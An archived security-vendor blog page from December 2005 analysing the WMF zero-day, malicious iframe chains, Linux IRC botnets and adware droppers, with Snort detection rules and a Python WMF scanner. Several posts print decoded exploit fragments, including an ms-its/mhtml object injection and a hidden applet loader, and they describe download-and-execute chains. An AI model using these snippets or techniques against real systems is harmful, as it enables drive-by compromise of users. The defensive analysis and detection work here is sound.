Archives for December 2005

WMF Exploit Links to Adware

  • Posted: December 30, 2005
  • Author: Virus Analyst

Adding to the list of URLs using the new WMF exploit, we received reports of a botnet that distributes WMF exploits from http://www.<BLOCKED>.biz/tr. We retrieved 10 WMF file samples, each with a distinct MD5 hash. The WMF files, to be detected as TROJ_NASCENE.GEN, contain malicious code that downloads and executes another malware. The downloaded malware, which will be detected as ADW_EXFOL.A, further downloads another malware already detected as ADW_EXFOL.A.


The detected adware displays a message box shown below:



After clicking on the Terms & Conditions, it opens a URL containing the Exfol EULA.




WMF Exploit Snort Detection

  • Posted: December 30, 2005
  • Author: Virus Analyst

Using Snort, the WMF exploit can be detected with the following set of rules.


# Rule 1: tags an HTTP 200 OK response stream (sets the HTTPSTREAM flowbit, no alert)
alert tcp any $HTTP_PORTS -> any any (sid:1006182; flow:from_server,established; content:"HTTP|2F|1|2E|"; nocase; depth:0; content:"200 OK"; nocase; within:8; flowbits:set,HTTPSTREAM; flowbits:noalert; classtype:VM;)


# Rules 2 and 3: identify a WMF file in that stream, either right after the
# response headers or anywhere in the payload (set the WMF flowbit, no alert)
alert tcp any $HTTP_PORTS -> any any (sid:1006183; flowbits:isset,HTTPSTREAM; flowbits:isnotset,WMF; content:"HTTP|2F|1|2E|"; nocase; depth:0; content:"200 OK"; nocase; within:8; content:"|0D 0A 0D 0A|"; pcre:"/.{0,8}[\x01\x02]\x00\x09\x00\x00\x03/AR"; flowbits:set,WMF; flowbits:noalert; classtype:VM;)

alert tcp any $HTTP_PORTS -> any any (sid:1006185; flowbits:isset,HTTPSTREAM; flowbits:isnotset,WMF; content:"|00 09 00 00 03|"; distance:1; pcre:"/[\x01\x02]\x00\x09\x00\x00\x03/"; flowbits:set,WMF; flowbits:noalert; classtype:VM;)


# Rule 4: alerts on the exploit record inside the identified WMF
alert tcp any $HTTP_PORTS -> any any (sid:1006187; flowbits:isset,WMF; content:"|26 06 09 00|"; classtype:VM;)


The rules were taken from ISC.SANS.ORG.
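The rules above key on the WMF header bytes and on the record bytes "|26 06 09 00|". As an added example (not from the original post and not the ISC rules), the Python scanner below applies the same logic to a file offline: it parses the WMF header, walks the record list, and flags any META_ESCAPE record (function 0x0626) whose escape number is SETABORTPROC (0x0009), the record the exploit depends on. The sample files are constructed inline with an all-zero dummy payload.

```python
import struct

# WMF record function number and escape code that the exploit depends on;
# these are the same bytes the Snort rule above matches as "|26 06 09 00|".
META_ESCAPE = 0x0626
SETABORTPROC = 0x0009
PLACEABLE_MAGIC = 0x9AC6CDD7  # optional 22-byte "placeable" preamble


def parse_header(data):
    """Return the offset of the first record, or None if this is not a WMF."""
    off = 0
    if len(data) >= 22 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_MAGIC:
        off = 22
    if len(data) < off + 18:
        return None
    mtype, hsize, version = struct.unpack_from("<HHH", data, off)
    # Same test as the Snort pcre: type 1 or 2, header size 9 words, version 0x0300
    if mtype not in (1, 2) or hsize != 9 or version != 0x0300:
        return None
    return off + 18


def find_setabortproc(data):
    """Offsets of every META_ESCAPE record carrying the SETABORTPROC escape."""
    off = parse_header(data)
    hits = []
    while off is not None and off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)
        if size_words < 3:  # size (2 words) + function (1 word) is the minimum
            break
        if func == META_ESCAPE and off + 8 <= len(data):
            if struct.unpack_from("<H", data, off + 6)[0] == SETABORTPROC:
                hits.append(off)
        off += size_words * 2
    return hits


def _record(func, params=b""):
    """Encode one WMF record: DWORD size in words, WORD function, parameters."""
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params


def build_sample(with_exploit_record):
    """Constructed test file: 18-byte header, a benign record, optional escape, EOF."""
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, 0, 0, 0, 0)
    body = _record(0x0103, struct.pack("<H", 8))  # META_SETMAPMODE, harmless
    if with_exploit_record:
        # escape number, byte count, then a dummy (all-zero) payload
        body += _record(META_ESCAPE, struct.pack("<HH", SETABORTPROC, 4) + b"\x00" * 4)
    return header + body + _record(0x0000)  # META_EOF
```

A file that passes parse_header but yields no hits is treated as clean; a missing or wrong header is not scanned at all, mirroring the flowbit gating in the rules.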


For those who are not familiar with Snort, here is a definition from www.snort.org: Snort is an open source network intrusion prevention and detection system utilizing a rule-driven language, which combines the benefits of signature, protocol and anomaly based inspection methods. With millions of downloads to date, Snort is the most widely deployed intrusion detection and prevention technology worldwide and has become the de facto standard for the industry.


More information about Snort is available at www.snort.org.


Microsoft Security Advisory (912840) – WMF Vulnerability

  • Posted: December 29, 2005
  • Author: Virus Analyst

Just to let you know, Microsoft has published a security advisory regarding the Zero-Day Exploit on Windows XP and 2003, which they have dubbed "Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution."


The information can be accessed at http://www.microsoft.com/technet/security/advisory/912840.mspx.



WMF Exploit and IrfanView

  • Posted: December 29, 2005
  • Author: Virus Analyst

You may have third-party software installed to view image files, including .wmf files and some other video/audio file formats. One freely available program used by many is IrfanView. I installed the latest version, version 3.98, which comes with an application called IrfanView Thumbnails that lets you browse IrfanView's supported file formats in a Windows Explorer-like interface. Out of curiosity, I tried viewing the malicious WMF files using that application. Surprisingly, the malicious code in the WMF files was executed and I got infected with the malware downloaded by the WMF file.


Also, after installing the software, WMF files are opened in IrfanView by default, and viewing a malicious WMF file in IrfanView executes the malicious code found in the file.


Thus, as a word of caution, don't just open or view unsolicited WMF files. When using Internet Explorer, you may apply the temporary solution suggested in a previous blog entry. Always update your pattern files; they can be downloaded from the links found at http://www.trendmicro.com/download/pattern.asp.


Another workaround suggested by Microsoft is to unregister the Windows Picture and Fax Viewer (Shimgvw.dll), quoted below.


To unregister Shimgvw.dll, follow these steps:


1. Click Start, click Run, type "regsvr32 -u %windir%\system32\shimgvw.dll" (without the quotation marks), and then click OK.


2. A dialog box appears to confirm that the unregistration process has succeeded. Click OK to close the dialog box.


Microsoft's advisory can be found at http://www.microsoft.com/technet/security/advisory/912840.mspx.



Exploited in Search of Money

  • Posted: December 28, 2005
  • Author: Virus Analyst

SANS reported that when searching for "money" in Google, one of the search results (http : //www . <BLOCKED> . com) is a site that compromises the user's PC.


I tried searching for "money" in Google but did not find the said site; maybe Google has already taken it down.


So I tried the link mentioned, and it is up and running.


The site fronts itself as GOLD COMPANY GROUP, a management fund aimed at middle-sized investors worldwide.


But in truth, hidden in the code of this site is an IFRAME pointing to http:// www.<BLOCKED>.com /image /index.htm, which contains another iframe pointing to two sites:



  • http: //www.<BLOCKED>.com /image /b.htm – This is already detected by Trend as JS_ONLOADXPLT.A
  • http: //www.<BLOCKED>.com /image /f.htm – This also contains exploit code used by JS_ONLOADXPLT.A

This results in the user's system being compromised.


Just a fair warning to Internet surfers out there: not everything seen on the net is good, so always double-check the links you go to.


Also, to be more secure, set your browser's security settings to HIGH and always patch your systems with the latest updates.



Bagle After Christmas: TROJ_BAGLE.GT

  • Posted: December 28, 2005
  • Author: Virus Analyst

I thought this night would be quiet, but here comes a 'bagle' with an MD5 of 7a7f3dd56fbd01f7618421fe7c9de1ce. I hope this will not have a second, third or fourth round like the previous Bagle. We'll see...


Meanwhile, you may visit our Advisories page for some details.



Fake MSN Messenger 8 Beta

  • Posted: December 28, 2005
  • Author: Virus Analyst

A malware sample was submitted to the Service Team for processing. This sample comes from a web site that claims to have a leaked MSN Messenger 8 Beta.


Here's a screenshot of the web page hosting the malware.



Update (JoneZ, 27 December 2005 23:26:09)

This malware will be detected as WORM_VIRKEL.B. As it spreads via MSN Messenger, it is advised that users should not click on unsolicited URLs in instant messaging software, even if they come from known contacts.



Zero-Day Exploit on Windows XP and 2003

  • Posted: December 28, 2005
  • Author: Virus Analyst


A new vulnerability has been found in Windows XP and 2003, in the Windows Picture and Fax Viewer. It allows arbitrary code to be executed by means of a corrupt Windows Metafile. Here's a link that exhibits the said vulnerability: http://<BLOCKED>.com/d/t1/wmf_exp.htm.

When you go to that link using IE, it opens the file wmf_exp.wmf, which contains exploit code. The WMF file is viewed by the Windows Picture and Fax Viewer, and since it contains exploit code, the code is executed. The exploit code downloads the file http://<BLOCKED>.com/d/ioo.exe and executes it.

As a temporary solution, you may set your Internet Explorer security settings to High. To do that:
1. Go to Settings > Control Panel.
2. Double-click Internet Options.
3. Click the Security tab, then click the Default Level button.
4. Move the slider up to High.
5. Click the Apply button.

This is the best way to set up IE to avoid those naughty webmasters who inject code into their sites to take advantage of the said vulnerability.

Additional sightings of URLs that exploit the said vulnerability:
http://<BLOCKED>.biz/parthner3/xpl.wmf.
-The code injected into this WMF file is encrypted using subtraction. It downloads the file http://<BLOCKED>.biz/parthner3/msits.exe and executes it.

http://www.<BLOCKED>.com/xpl.wmf.
-The code injected into this WMF file is encrypted using XOR. It downloads the file http://www.<BLOCKED>.net/xexe.exe and executes it.

And here are more sites that have been seen with manifestations of the said vulnerability but are currently down:
http://<BLOCKED>.biz
http://<BLOCKED>.ws



Update(Jovs, 28 December 2005 21:37:47)


The files containing the new WMF exploit are now detected as WMF_NASCENCE.A.



Update(Jessie, 29 December 2005 10:10:33)


The previous detection name has been renamed to TROJ_WMFIOO.A.



PHP exploits, Linux bots, and a DDoS botnet

  • Posted: December 28, 2005
  • Author: Virus Analyst

A few days ago, an IRC based botnet was spotted conducting a denial of service attack. The DDoS attack is quite massive – it has a bandwidth of about 6 Gbps (gigabits per second), which equates to around 12 million PPS (packets per second).


The bots used in this DDoS botnet are Linux-based, not Windows bots. The bot runs on "GLIBC_2.1.3, GLIBC_2.1, and GLIBC_2.0 compatible x86 Linux boxen."


Moreover, it was discovered that these bots are propagated through a PHP exploit.


The PHP exploit is not targeted at a specific vulnerability in a particular PHP-based application; rather, it targets PHP applications in general. The vulnerability lies in poorly written PHP applications that perform includes without validating the include string.


For this particular botnet, the inserted command downloads an ELF file from a server located in Japan. This ELF file is the bot software, which reports to an IRC-based C&C server residing on the same machine from which the ELF file is downloaded.


It was reported that the C&C and download server has been taken down by the Japanese government.


There has been a rising trend in the number of Linux bots captured. These bots are in fact written in several programming languages; so far we have captured bots that come as ELF files and as Perl and PHP scripts. Samples include:



  • ELF_KAIGENT family
  • ELF_KAITEN
  • PHP_CHAPLOIT family
  • ELF Binaries
  • PERL_SHELLBOT family

Note that several of these Linux bots are being propagated through exploits in several Perl and PHP-based web applications, like AWStats, PHPBB, Mambo, Coppermine, and XML-RPC, to name a few.


The source code for the ELF Kaiten bot has been around since 2001. This predates several Windows-based bots.


The rising trend in the popularity of Linux bots prompted the ISC to post a warning, saying that bots are not just for Windows anymore. Furthermore, it writes "… it's so much easier to write a bot for Linux. You got perl after all. I wouldn't be surprised to find one written in bash."



Hide and Seek… A Method for Lasting Longer Online

  • Posted: December 23, 2005
  • Author: Virus Analyst

New methods have surfaced, and the spyware threat has just gotten "smarter". Some sites now use several vulnerabilities at once to deploy a single file, banking on the hope that at least one of these methods will hit an unpatched vulnerability and compromise the system.


Many sites already use this method of deploying malicious content onto a system; here is a view of what happens with our sample site.


Either by redirection or from some other website, the user is taken to <BLOCKED>/RC, a site that contains an ANI file exploit and 6 iframes, each using a different method of pushing a certain file onto the user's system. Depending on the security settings of the system and the patches in place, the user's PC may execute one, two or all of the contents of the 6 iframes.


IFRAME 1: http://<BLOCKED>/RC/exp_4/index.htm



  • The code is escaped three times before the malicious code is revealed. Even then, it is filled with garbage code in order to confuse the scanner.
  • Then the file downloaded from <BLOCKED>/RC/web.exe is dropped and launched on the system.

FINAL CODE:


IFRAME 2:



  • Same as IFRAME 1.

IFRAME 3: http://<BLOCKED>/RC/exp_sp6/index.htm



  • This is also escaped three times, in a non-straightforward manner, before the final code is revealed.
  • Then a CHM file is launched. This CHM file drops and launches web.exe by exploiting the MS04-013 vulnerability; this is the same file launched by the earlier IFRAME.

FINAL CODE:


document.write('<object data="ms-its:mhtml:file://c:\c.mht!'+PATH+'::/logo.php" type="text/x-scriptlet"></object>');


IFRAME 4: http://<BLOCKED>/RC/exp_3/index.htm



  • Escaped three times, and the final code contains garbage code to confuse the scanner.
  • The final code then launches web.exe using a vulnerability.

FINAL CODE:


IFRAME 5: http://<BLOCKED>/RC/exp_sp60/index.htm



  • The code is clear for this part.
  • It opens <BLOCKED>/RC/exp_sp60/int.htm, which executes <BLOCKED>/RC/exp_sp60/final/int.hta.
  • The end result is similar to that of the earlier IFRAMEs.

IFRAME 6: http://<BLOCKED>/RC/exp_5/index.htm



  • The code is again escaped three times before the final code is revealed.
  • The final code executes both web.exe from <BLOCKED>/RC/web.exe and count.jar (JAVA_BYTEVER.A) from <BLOCKED>/RC/exp_5/count.jar
FINAL CODE:

document.write("<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1>");
document.write("<PARAM NAME='url' VALUE='"+PATH+"'>");
document.write("");


Sites that peddle spyware and its cohorts (downloaders and droppers) will employ every possible technique to push them onto the user's system. Against aggressive methods such as this, we need to be vigilant about applying the latest patches to secure our systems.


Copyright © 2021 Trend Micro Incorporated. All rights reserved.